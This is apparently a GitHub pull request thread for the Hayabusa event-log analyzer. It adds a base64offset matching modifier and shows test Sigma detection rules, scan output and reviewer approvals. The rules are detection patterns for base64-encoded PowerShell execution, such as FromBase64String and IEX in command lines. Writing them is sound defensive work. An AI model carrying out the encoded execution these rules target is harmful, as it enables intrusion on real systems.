Added support for |base64offset|contains pipe keyword

[hitenkoku]

What Changed

• added support for |base64offset|contains pipe keyword

Evidence

I created the following rule(rule is suggested by @YamatoSecurity . Very Thanks.) and ran the command . /hayabusa.exe csv-timeline -o output.csv -q -r <following rule file path> .

title: base64offset contains test
status: test
description: test for base64offset
detection:
  selection1:
    - CommandLine|base64offset|contains: "http://"
    - CommandLine|base64offset|contains: "https://"
  selection2:
    CommandLine|base64offset|contains: "::FromBase64String"
  selection3:
    CommandLine|base64offset|contains: "powershell"
  condition: selection1 or selection2 or selection3
falsepositives:
  - Unknown
level: high

for [hayabusa-sample-evtx](https:/Yamato-Security/hayabusa-sample-evtx/commit/8367ec2115aa5b3daed782f7e8d2a21843be3614)

>./705.exe csv-timeline -d ..\hayabusa-sample-evtx\ -r .\testbase64.yml -o 705.csv -q
...
Analyzing event files: 584
Total file size: 137.1 MB

Loading detections rules. Please wait.


Test rules: 1 (100.00%)

Other rules: 1
Total enabled detection rules: 1

Scanning in progress. Please wait.

584 / 584 [==========================================================================] 100.00 %

Analysis finished. Please wait while the results are being saved.

Results Summary:

Events with hits / Total events: 4 / 47,472 (Data reduction: 47,468 events (99.99%))

Total | Unique detections: 4 | 1
Total | Unique critical detections: 0 (0.00%) | 0 (0.00%)
Total | Unique high detections: 4 (100.00%) | 1 (100.00%)
Total | Unique medium detections: 0 (0.00%) | 0 (0.00%)
Total | Unique low detections: 0 (0.00%) | 0 (0.00%)
Total | Unique informational detections: 0 (0.00%) | 0 (0.00%)

Dates with most total detections:
critical: n/a, high: 2020-08-02 (3), medium: n/a, low: n/a, informational: n/a

Top 5 computers with most unique detections:
critical: n/a
high: IE10Win7 (1), mssql01.offsec.lan (1)
medium: n/a
low: n/a
informational: n/a

╭────────────────────────────────────────────────────────────╮
│ Top critical alerts:        Top high alerts:               │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         base64offset contains test (4) │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top medium alerts:          Top low alerts:                │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top informational alerts:                                  │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
╰───────────────────────────╌────────────────────────────────╯

Saved file: 705.csv (7.5 KB)
Elapsed time: 00:00:01.163

6.1 GB evtx files in https://issues/778#issuecomment-1296504766

>./705.exe csv-timeline -d ..\all-evtx\ -r .\testbase64.yml -o 705.csv -q
...
Analyzing event files: 1858
Total file size: 6.1 GB

Loading detections rules. Please wait.


Test rules: 1 (100.00%)

Other rules: 1
Total enabled detection rules: 1

Scanning in progress. Please wait.

1858 / 1858 [========================================================================] 100.00 %

Analysis finished. Please wait while the results are being saved.

Results Summary:

Events with hits / Total events: 3 / 4,817,181 (Data reduction: 4,817,178 events (100.00%))

Total | Unique detections: 3 | 1
Total | Unique critical detections: 0 (0.00%) | 0 (0.00%)
Total | Unique high detections: 3 (100.00%) | 1 (100.00%)
Total | Unique medium detections: 0 (0.00%) | 0 (0.00%)
Total | Unique low detections: 0 (0.00%) | 0 (0.00%)
Total | Unique informational detections: 0 (0.00%) | 0 (0.00%)

Dates with most total detections:
critical: n/a, high: 2022-03-03 (2), medium: n/a, low: n/a, informational: n/a

Top 5 computers with most unique detections:
critical: n/a
high: DESKTOP-6D0DBMB (1), evtx-PC (1)
medium: n/a
low: n/a
informational: n/a

╭────────────────────────────────────────────────────────────╮
│ Top critical alerts:        Top high alerts:               │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         base64offset contains test (3) │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top medium alerts:          Top low alerts:                │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top informational alerts:                                  │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
╰───────────────────────────╌────────────────────────────────╯

Saved file: 705.csv (8.8 KB)
Elapsed time: 00:00:42.309

[codecov]

Codecov Report

Base: 74.82% // Head: 74.92% // Increases project coverage by +0.09% 🎉

Coverage data is based on head (e9b7f9e) compared to base (ed6bd86).
Patch coverage: 92.30% of modified lines in pull request are covered.

Additional details and impacted files

@@            Coverage Diff             @@
##             main     #926      +/-   ##
==========================================
+ Coverage   74.82%   74.92%   +0.09%     
==========================================
  Files          24       24              
  Lines       15935    16034      +99     
==========================================
+ Hits        11924    12013      +89     
- Misses       4011     4021      +10     

Impacted Files	Coverage Δ
src/detections/rule/matchers.rs	96.20% <92.30%> (-0.33%)	⬇️

Help us with your feedback. Take ten seconds to tell us how you rate us. Have a feature suggestion? Share it here.

☔ View full report at Codecov.
📢 Do you have feedback about the report comment? Let us know in this issue.

[fukusuket]

I tested with the following detection logs containing base64 strings:

./hayabusa csv-timeline -f ./hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -r ./rules/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml

The rule used for testing is as follows:

title: base64offset contains test
status: test
description: test for base64offset
detection:
    SELECTION_1:
        Channel: Microsoft-Windows-Sysmon/Operational
    SELECTION_2:
        CommandLine|base64offset|contains: '$XX=IEX'
    condition: SELECTION_1 and SELECTION_2
falsepositives:
    - Unknown
level: high

I confirmed that the string after base64 decoding can be detected.
LGTM!🚀

[YamatoSecurity]

I was able to confirm this is working as expected as well. Thank you!